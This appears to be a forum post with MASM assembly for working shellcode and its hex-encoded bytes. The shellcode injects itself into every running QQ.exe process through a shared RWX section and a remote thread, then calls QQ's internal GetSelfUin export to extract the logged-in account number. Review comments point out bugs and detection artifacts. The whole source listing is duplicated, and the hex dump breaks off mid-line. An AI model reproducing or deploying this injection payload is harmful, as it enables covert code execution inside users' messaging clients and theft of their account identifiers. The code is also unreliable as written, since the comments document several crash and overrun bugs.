zklhp 2013-01-07 19:19
代码预览:
代码:

.386
.model flat, stdcall
option casemap :none
include windows.inc
includelib user32.lib
include myMacro.asm
injectCode proto
.CODE
; DeBug = 1 selects the verbose build of the macros in myMacro.asm (not shown):
; the DebugView capture at the bottom of the page shows one OutputDebugStringA
; line per ImportApiCall in this mode.
DeBug = 1 ; debug mode: grows the binary; comment out for release (author's note)
; SHELLCODE new layout: declare the import tables. Note: no double quotes here -
; DLL and API names are bare identifiers consumed by the Import macro.
; MyIAT - imports used by the injector side (START). LoadLibraryA is listed but
; is not referenced by START or injectCode themselves.
Import MyIAT, Kernel32,GetModuleHandleA,GetProcAddress,Process32First,CreateToolhelp32Snapshot,lstrcmpiA,Process32Next,CloseHandle,\
CreateRemoteThread,OpenProcess,LoadLibraryA,WaitForSingleObject,GetExitCodeThread,CreateFileMappingA,GetCurrentProcessId
Import MyIAT, Kernel32,RtlMoveMemory,OutputDebugStringA
Import MyIAT, ntdll,NtMapViewOfSection
Import MyIAT, user32,wsprintfA
; injectIAT - the minimal import set for the payload that runs inside the target.
Import injectIAT, Kernel32,GetModuleHandleA,GetProcAddress
; First instruction of the shellcode: skip injectCode (executed only inside the
; target process) and enter the injector at START.
jmp START
;-----------------------------------------------------------------------
; injectCode - payload executed inside the target process as a remote
;   thread (START passes ViewBase1 as the CreateRemoteThread start address
;   and 0 as lpParameter).
; In:   nothing
; Out:  eax = value returned by KernelUtil!?GetSelfUin@Contact@Util@@YAKXZ
;       (a mangled C++ export, reads as Util::Contact::GetSelfUin); START
;       reads it back as the thread exit code via GetExitCodeThread.
; Only the two APIs in injectIAT are used; the bytes are copied verbatim
; into a pagefile-backed section, so nothing here may depend on its
; link-time address.
; NOTE(review): the fall-through path after `xor eax,eax` has no `ret`
; and no frame teardown - `endp` emits nothing, and the listed bytes show
; `C9 C3` only after `call eax` - so when KernelUtil.dll or the export is
; missing the thread runs past injectCodeEnd into whatever follows in the
; mapped view. Defender note: the observable artifact is a remote thread
; whose start address lies in a region not backed by any image on disk.
;-----------------------------------------------------------------------
injectCode proc
; assembler-time: print the size of the API buffer
%echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT))
local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD ; API address buffer on the remote thread's stack
LdrImport injectIAT,APIArrayBuff ; resolve every API in the import table (macro in myMacro.asm, not shown)
ImportApiCall GetModuleHandleA,"KernelUtil.dll" ; GetModuleHandleA does not load; NULL unless the target already has it
.if eax
ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ" ; mangled C++ export: Util::Contact::GetSelfUin
.if eax
call eax ; get the QQ number; returned in eax and becomes the thread exit code
ret ; MASM expands this to leave/ret because of the local
.endif
.endif
xor eax,eax ; NOTE(review): no ret follows - execution falls through injectCodeEnd (see header)
injectCode endp
; End marker of the payload. injectCodelen is the byte length of injectCode
; that START copies with RtlMoveMemory - only these bytes exist in the
; target; the rest of the 4 KiB view stays zero.
injectCodeEnd:
injectCodelen = injectCodeEnd-injectCode
;-----------------------------------------------------------------------
; START - injector entry point (the `jmp START` at the top lands here).
; ABI:   flat 32-bit stdcall build (.model flat, stdcall); no arguments.
; Out:   nothing in registers (pushad/popad bracket the body); the result
;        is reported only via OutputDebugStringA.
; Flow (all visible below):
;   1. resolve MyIAT into APIArrayBuff (LdrImport, myMacro.asm);
;   2. create a 4 KiB pagefile-backed section (CreateFileMappingA with
;      INVALID_HANDLE_VALUE) with PAGE_EXECUTE_READWRITE;
;   3. map it into this process (NtMapViewOfSection on a handle to self)
;      and copy injectCodelen bytes of injectCode into it;
;   4. walk the Toolhelp32 snapshot; for every entry whose szExeFile is
;      "QQ.exe", map the same section into that process, start a remote
;      thread at the view base, wait, read the exit code and log it.
; Detection/forensic notes: one section object is mapped RWX into two
; processes; the remote thread starts in a non-image region; the section
; handle (hMappedFile) and the local view are never released, so they
; persist in this process for its lifetime; in the DeBug build every call
; is narrated via OutputDebugStringA (see the DebugView capture below).
;-----------------------------------------------------------------------
START proc
local APIArrayBuff[__GetBuffSize__(MyIAT)]:DWORD ; API address buffer; the constant __APiNumber__ can also be used (author's note)
LOCAL info:PROCESSENTRY32 ; Toolhelp32 entry; dwSize is set before Process32First
LOCAL handle:HANDLE ; snapshot handle
LOCAL hProcess1:HANDLE,hProcess2:HANDLE ; hProcess1 = target QQ.exe, hProcess2 = this process
local hMappedFile:HANDLE,ViewBase1:DWORD,ViewBase2:DWORD,ViewSize:DWORD,radr:dword ; section handle; view base 1 = remote, 2 = local; in/out view size; runtime address of injectCode
LOCAL hRemoteThread:dword,Return_Value:dword ; remote thread handle and its exit code
local @QQUid[16]:BYTE ; wsprintfA output buffer; see the overrun note at the wsprintfA call
; assembler-time: print the size of the API buffer
%echo MyIAT,__GetBuffSize__,num2str(__GetBuffSize__(MyIAT))
pushad ; preserve all GPRs; matched by popad at the end
LdrImport MyIAT,APIArrayBuff ; resolve every API in the import table into APIArrayBuff
mov ViewSize,1024*4 ; requested view size; matches the section size created next
; pagefile-backed section (no file), executable and writable, 4 KiB
ImportApiCall CreateFileMappingA, INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE , 0, 1024*4, NULL
mov hMappedFile,eax ; NOTE(review): not checked for NULL and never closed
ImportApiCall GetCurrentProcessId
ImportApiCall OpenProcess, PROCESS_ALL_ACCESS,FALSE,eax ; handle to this process (eax = own PID)
mov hProcess2,eax
and ViewBase2,0 ; BaseAddress must be zeroed or the call fails on Win7 (author's note)
; SectionHandle, ProcessHandle, *BaseAddress, ZeroBits, CommitSize, SectionOffset, *ViewSize,
; InheritDisposition = 1 (ViewShare), AllocationType, Win32Protect
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
; NOTE(review): MASM compares a bare register unsigned, so `.if eax>=0` is
; always true (the listed bytes show `cmp eax,0 / jb`); a failing NTSTATUS is
; not detected here nor at the second NtMapViewOfSection below.
.if eax>=0
BaseRelocations eax ; macro in myMacro.asm; presumably leaves the load delta in eax (the listed bytes do call $+5 / sub / pop)
lea eax,[offset injectCode + eax] ; runtime address of injectCode; don't forget relocation (author's note)
mov radr,eax
ImportApiCall RtlMoveMemory,ViewBase2,radr,injectCodelen ; copy only injectCode's bytes into the local view of the section
ImportApiCall CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ; process snapshot
mov handle,eax ; NOTE(review): INVALID_HANDLE_VALUE is not checked
mov info.dwSize,sizeof PROCESSENTRY32 ; required before Process32First
ImportApiCall Process32First,handle,addr info ; return value unchecked; the loop body runs at least once
.repeat
ImportApiCall lstrcmpiA,addr info.szExeFile,"QQ.exe" ; case-insensitive match against the process name we are looking for
.if !eax
; numeric mask 4095 = 0xFFF: the process-specific rights only, unlike the
; PROCESS_ALL_ACCESS (0x1F0FFF in the listed bytes) used for the self handle
ImportApiCall OpenProcess,4095, 0,info.th32ProcessID
.if eax
mov hProcess1,eax
and ViewBase1,0 ; let the kernel choose the remote base address
mov ViewSize,1024*4 ; ViewSize is in/out; reset after the previous call rewrote it
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0 ; same unsigned-compare caveat as above: always true
; remote thread in the target starting at the view base; lpParameter = 0
ImportApiCall CreateRemoteThread,hProcess1,0,0,ViewBase1,0,0,0
.if eax
mov hRemoteThread,eax
ImportApiCall WaitForSingleObject,hRemoteThread, INFINITE ; no timeout: a hung payload hangs the injector
ImportApiCall GetExitCodeThread,hRemoteThread, addr Return_Value ; exit code = injectCode's eax
; wsprintfA is cdecl/variadic, so the caller must drop its arguments: esp is
; saved in esi and restored afterwards instead of relying on the call macro
push esi
mov esi,esp
; NOTE(review): @QQUid is 16 bytes; the GBK prefix of the format string is 11
; bytes (per the listed bytes) and wsprintfA appends a NUL, so any value with
; five or more decimal digits overruns this local
ImportApiCall wsprintfA,addr @QQUid,"获取到QQ号:%d",Return_Value
ImportApiCall OutputDebugStringA,addr @QQUid ; report the result to an attached debugger / DebugView
mov esp,esi
pop esi
ImportApiCall CloseHandle,hRemoteThread
.endif
.endif
ImportApiCall CloseHandle,hProcess1 ; the remote view is left mapped in the target (no unmap call)
.endif
.endif
ImportApiCall Process32Next,handle,addr info
.until !eax ; stop when the enumeration is exhausted
ImportApiCall CloseHandle,handle
.endif
ImportApiCall CloseHandle,hProcess2 ; the local view (ViewBase2) and hMappedFile are not released
popad
ret ; MASM emits leave/ret because of the locals
START endp
end START
.model flat, stdcall
option casemap :none
include windows.inc
includelib user32.lib
include myMacro.asm
injectCode proto
.CODE
; DeBug = 1 selects the verbose build of the macros in myMacro.asm (not shown):
; the DebugView capture at the bottom of the page shows one OutputDebugStringA
; line per ImportApiCall in this mode.
DeBug = 1 ; debug mode: grows the binary; comment out for release (author's note)
; SHELLCODE new layout: declare the import tables. Note: no double quotes here -
; DLL and API names are bare identifiers consumed by the Import macro.
; MyIAT - imports used by the injector side (START). LoadLibraryA is listed but
; is not referenced by START or injectCode themselves.
Import MyIAT, Kernel32,GetModuleHandleA,GetProcAddress,Process32First,CreateToolhelp32Snapshot,lstrcmpiA,Process32Next,CloseHandle,\
CreateRemoteThread,OpenProcess,LoadLibraryA,WaitForSingleObject,GetExitCodeThread,CreateFileMappingA,GetCurrentProcessId
Import MyIAT, Kernel32,RtlMoveMemory,OutputDebugStringA
Import MyIAT, ntdll,NtMapViewOfSection
Import MyIAT, user32,wsprintfA
; injectIAT - the minimal import set for the payload that runs inside the target.
Import injectIAT, Kernel32,GetModuleHandleA,GetProcAddress
; First instruction of the shellcode: skip injectCode (executed only inside the
; target process) and enter the injector at START.
jmp START
;-----------------------------------------------------------------------
; injectCode - payload executed inside the target process as a remote
;   thread (START passes ViewBase1 as the CreateRemoteThread start address
;   and 0 as lpParameter).
; In:   nothing
; Out:  eax = value returned by KernelUtil!?GetSelfUin@Contact@Util@@YAKXZ
;       (a mangled C++ export, reads as Util::Contact::GetSelfUin); START
;       reads it back as the thread exit code via GetExitCodeThread.
; Only the two APIs in injectIAT are used; the bytes are copied verbatim
; into a pagefile-backed section, so nothing here may depend on its
; link-time address.
; NOTE(review): the fall-through path after `xor eax,eax` has no `ret`
; and no frame teardown - `endp` emits nothing, and the listed bytes show
; `C9 C3` only after `call eax` - so when KernelUtil.dll or the export is
; missing the thread runs past injectCodeEnd into whatever follows in the
; mapped view. Defender note: the observable artifact is a remote thread
; whose start address lies in a region not backed by any image on disk.
;-----------------------------------------------------------------------
injectCode proc
; assembler-time: print the size of the API buffer
%echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT))
local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD ; API address buffer on the remote thread's stack
LdrImport injectIAT,APIArrayBuff ; resolve every API in the import table (macro in myMacro.asm, not shown)
ImportApiCall GetModuleHandleA,"KernelUtil.dll" ; GetModuleHandleA does not load; NULL unless the target already has it
.if eax
ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ" ; mangled C++ export: Util::Contact::GetSelfUin
.if eax
call eax ; get the QQ number; returned in eax and becomes the thread exit code
ret ; MASM expands this to leave/ret because of the local
.endif
.endif
xor eax,eax ; NOTE(review): no ret follows - execution falls through injectCodeEnd (see header)
injectCode endp
; End marker of the payload. injectCodelen is the byte length of injectCode
; that START copies with RtlMoveMemory - only these bytes exist in the
; target; the rest of the 4 KiB view stays zero.
injectCodeEnd:
injectCodelen = injectCodeEnd-injectCode
;-----------------------------------------------------------------------
; START - injector entry point (the `jmp START` at the top lands here).
; ABI:   flat 32-bit stdcall build (.model flat, stdcall); no arguments.
; Out:   nothing in registers (pushad/popad bracket the body); the result
;        is reported only via OutputDebugStringA.
; Flow (all visible below):
;   1. resolve MyIAT into APIArrayBuff (LdrImport, myMacro.asm);
;   2. create a 4 KiB pagefile-backed section (CreateFileMappingA with
;      INVALID_HANDLE_VALUE) with PAGE_EXECUTE_READWRITE;
;   3. map it into this process (NtMapViewOfSection on a handle to self)
;      and copy injectCodelen bytes of injectCode into it;
;   4. walk the Toolhelp32 snapshot; for every entry whose szExeFile is
;      "QQ.exe", map the same section into that process, start a remote
;      thread at the view base, wait, read the exit code and log it.
; Detection/forensic notes: one section object is mapped RWX into two
; processes; the remote thread starts in a non-image region; the section
; handle (hMappedFile) and the local view are never released, so they
; persist in this process for its lifetime; in the DeBug build every call
; is narrated via OutputDebugStringA (see the DebugView capture below).
;-----------------------------------------------------------------------
START proc
local APIArrayBuff[__GetBuffSize__(MyIAT)]:DWORD ; API address buffer; the constant __APiNumber__ can also be used (author's note)
LOCAL info:PROCESSENTRY32 ; Toolhelp32 entry; dwSize is set before Process32First
LOCAL handle:HANDLE ; snapshot handle
LOCAL hProcess1:HANDLE,hProcess2:HANDLE ; hProcess1 = target QQ.exe, hProcess2 = this process
local hMappedFile:HANDLE,ViewBase1:DWORD,ViewBase2:DWORD,ViewSize:DWORD,radr:dword ; section handle; view base 1 = remote, 2 = local; in/out view size; runtime address of injectCode
LOCAL hRemoteThread:dword,Return_Value:dword ; remote thread handle and its exit code
local @QQUid[16]:BYTE ; wsprintfA output buffer; see the overrun note at the wsprintfA call
; assembler-time: print the size of the API buffer
%echo MyIAT,__GetBuffSize__,num2str(__GetBuffSize__(MyIAT))
pushad ; preserve all GPRs; matched by popad at the end
LdrImport MyIAT,APIArrayBuff ; resolve every API in the import table into APIArrayBuff
mov ViewSize,1024*4 ; requested view size; matches the section size created next
; pagefile-backed section (no file), executable and writable, 4 KiB
ImportApiCall CreateFileMappingA, INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE , 0, 1024*4, NULL
mov hMappedFile,eax ; NOTE(review): not checked for NULL and never closed
ImportApiCall GetCurrentProcessId
ImportApiCall OpenProcess, PROCESS_ALL_ACCESS,FALSE,eax ; handle to this process (eax = own PID)
mov hProcess2,eax
and ViewBase2,0 ; BaseAddress must be zeroed or the call fails on Win7 (author's note)
; SectionHandle, ProcessHandle, *BaseAddress, ZeroBits, CommitSize, SectionOffset, *ViewSize,
; InheritDisposition = 1 (ViewShare), AllocationType, Win32Protect
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
; NOTE(review): MASM compares a bare register unsigned, so `.if eax>=0` is
; always true (the listed bytes show `cmp eax,0 / jb`); a failing NTSTATUS is
; not detected here nor at the second NtMapViewOfSection below.
.if eax>=0
BaseRelocations eax ; macro in myMacro.asm; presumably leaves the load delta in eax (the listed bytes do call $+5 / sub / pop)
lea eax,[offset injectCode + eax] ; runtime address of injectCode; don't forget relocation (author's note)
mov radr,eax
ImportApiCall RtlMoveMemory,ViewBase2,radr,injectCodelen ; copy only injectCode's bytes into the local view of the section
ImportApiCall CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ; process snapshot
mov handle,eax ; NOTE(review): INVALID_HANDLE_VALUE is not checked
mov info.dwSize,sizeof PROCESSENTRY32 ; required before Process32First
ImportApiCall Process32First,handle,addr info ; return value unchecked; the loop body runs at least once
.repeat
ImportApiCall lstrcmpiA,addr info.szExeFile,"QQ.exe" ; case-insensitive match against the process name we are looking for
.if !eax
; numeric mask 4095 = 0xFFF: the process-specific rights only, unlike the
; PROCESS_ALL_ACCESS (0x1F0FFF in the listed bytes) used for the self handle
ImportApiCall OpenProcess,4095, 0,info.th32ProcessID
.if eax
mov hProcess1,eax
and ViewBase1,0 ; let the kernel choose the remote base address
mov ViewSize,1024*4 ; ViewSize is in/out; reset after the previous call rewrote it
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0 ; same unsigned-compare caveat as above: always true
; remote thread in the target starting at the view base; lpParameter = 0
ImportApiCall CreateRemoteThread,hProcess1,0,0,ViewBase1,0,0,0
.if eax
mov hRemoteThread,eax
ImportApiCall WaitForSingleObject,hRemoteThread, INFINITE ; no timeout: a hung payload hangs the injector
ImportApiCall GetExitCodeThread,hRemoteThread, addr Return_Value ; exit code = injectCode's eax
; wsprintfA is cdecl/variadic, so the caller must drop its arguments: esp is
; saved in esi and restored afterwards instead of relying on the call macro
push esi
mov esi,esp
; NOTE(review): @QQUid is 16 bytes; the GBK prefix of the format string is 11
; bytes (per the listed bytes) and wsprintfA appends a NUL, so any value with
; five or more decimal digits overruns this local
ImportApiCall wsprintfA,addr @QQUid,"获取到QQ号:%d",Return_Value
ImportApiCall OutputDebugStringA,addr @QQUid ; report the result to an attached debugger / DebugView
mov esp,esi
pop esi
ImportApiCall CloseHandle,hRemoteThread
.endif
.endif
ImportApiCall CloseHandle,hProcess1 ; the remote view is left mapped in the target (no unmap call)
.endif
.endif
ImportApiCall Process32Next,handle,addr info
.until !eax ; stop when the enumeration is exhausted
ImportApiCall CloseHandle,handle
.endif
ImportApiCall CloseHandle,hProcess2 ; the local view (ViewBase2) and hMappedFile are not released
popad
ret ; MASM emits leave/ret because of the locals
START endp
end START
下面是调试输出模式的shellcode:
代码:
E9 E2 02 00 00 55 8B EC 83 C4 F8 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04
8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44
10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B
3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4
08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C
6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C
65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75 74 44 65 62 75 67
53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00 00 44 65 62 75 67
20 6D 6F 64 65 21 00 FF 54 24 14 E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00
47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00
5F B9 01 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68 8B D8
56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24 08 89
44 8D F8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66 61 69
6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01 59 49
0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61 6D 65
3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C 24 08
B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 60 E8 30 00 00 00 69 6E 6A 65 63 74 49 41
54 3A 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 09 09 09 28 22 4B 65 72 6E 65 6C 55 74 69
6C 2E 64 6C 6C 22 29 00 FF 55 00 61 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00
FF 55 F8 0B C0 74 7E 60 E8 43 00 00 00 69 6E 6A 65 63 74 49 41 54 3A 47 65 74 50 72 6F 63 41 64
64 72 65 73 73 09 09 09 28 65 61 78 2C 22 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63
74 40 55 74 69 6C 40 40 59 41 4B 58 5A 22 29 00 FF 55 00 61 E8 20 00 00 00 3F 47 65 74 53 65 6C
66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74
04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40
D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B
D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65
73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48
18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04
E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65
74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75
74 44 65 62 75 67 53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00
00 44 65 62 75 67 20 6D 6F 64 65 21 00 FF 54 24 14 E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E
4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47
65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50
72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E
61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43
6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70
65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69
6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65
61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73
73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72
69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66
41 00 5F B9 04 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68
8B D8 56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24
08 89 44 8D B8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66
61 69 6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01
59 49 0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61
6D 65 3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C
24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 60 E8
5C 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 09 09 09 28
49 4E 56 41 4C 49 44 5F 48 41 4E 44 4C 45 5F 56 41 4C 55 45 2C 4E 55 4C 4C 2C 50 41 47 45 5F 45
58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 2C 30 2C 31 30 32 34 2A 34 2C 4E 55 4C 4C 29 00
FF 55 00 61 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF 60 E8 1F 00
00 00 4D 79 49 41 54 3A 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 09 09 09 28 29
00 FF 55 00 61 FF 55 EC 60 E8 33 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63 65 73 73 09
09 09 28 50 52 4F 43 45 53 53 5F 41 4C 4C 5F 41 43 43 45 53 53 2C 46 41 4C 53 45 2C 65 61 78 29
00 FF 55 00 61 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 60 E8 71
00 00 00 4D 79 49 41 54 3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68
4D 61 70 70 65 64 46 69 6C 65 2C 68 50 72 6F 63 65 73 73 32 2C 61 64 64 72 20 56 69 65 77 42 61
73 65 32 2C 30 2C 30 2C 30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45
5F 45 58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85
74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55
F8 83 F8 00 0F 82 16 05 00 00 E8 00 00 00 00 81 2C 24 CF 17 40 00 58 8D 80 05 10 40 00 89 85 70
FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 09 09 09 28
56 69 65 77 42 61 73 65 32 2C 72 61 64 72 2C 69 6E 6A 65 63 74 43 6F 64 65 6C 65 6E 29 00 FF 55
00 61 68 E2 02 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 60 E8 38 00 00 00 4D 79 49 41
54 3A 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 09 09 09 28 54 48
33 32 43 53 5F 53 4E 41 50 50 52 4F 43 45 53 53 2C 30 29 00 FF 55 00 61 6A 00 6A 02 FF 55 C4 89
85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 60 E8 2A 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65
73 73 33 32 46 69 72 73 74 09 09 09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF
55 00 61 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 60 E8 31 00 00 00 4D 79 49 41 54 3A 6C
73 74 72 63 6D 70 69 41 09 09 09 28 61 64 64 72 20 69 6E 66 6F 2E 73 7A 45 78 65 46 69 6C 65 2C
22 51 51 2E 65 78 65 22 29 00 FF 55 00 61 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF
50 FF 55 C8 0B C0 0F 85 39 03 00 00 60 E8 30 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63
65 73 73 09 09 09 28 34 30 39 35 2C 30 2C 69 6E 66 6F 2E 74 68 33 32 50 72 6F 63 65 73 73 49 44
29 00 FF 55 00 61 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 E7 02 00 00 89 85
88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 60 E8 71 00 00 00 4D 79 49 41 54
3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68 4D 61 70 70 65 64 46 69
6C 65 2C 68 50 72 6F 63 65 73 73 31 2C 61 64 64 72 20 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45 5F 45 58 45 43 55 54 45
5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A
00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 F0 01
00 00 60 E8 3B 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64
09 09 09 28 68 50 72 6F 63 65 73 73 31 2C 30 2C 30 2C 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 29 00 FF 55 00 61 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4
0B C0 0F 84 8A 01 00 00 89 85 6C FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 57 61 69 74 46 6F
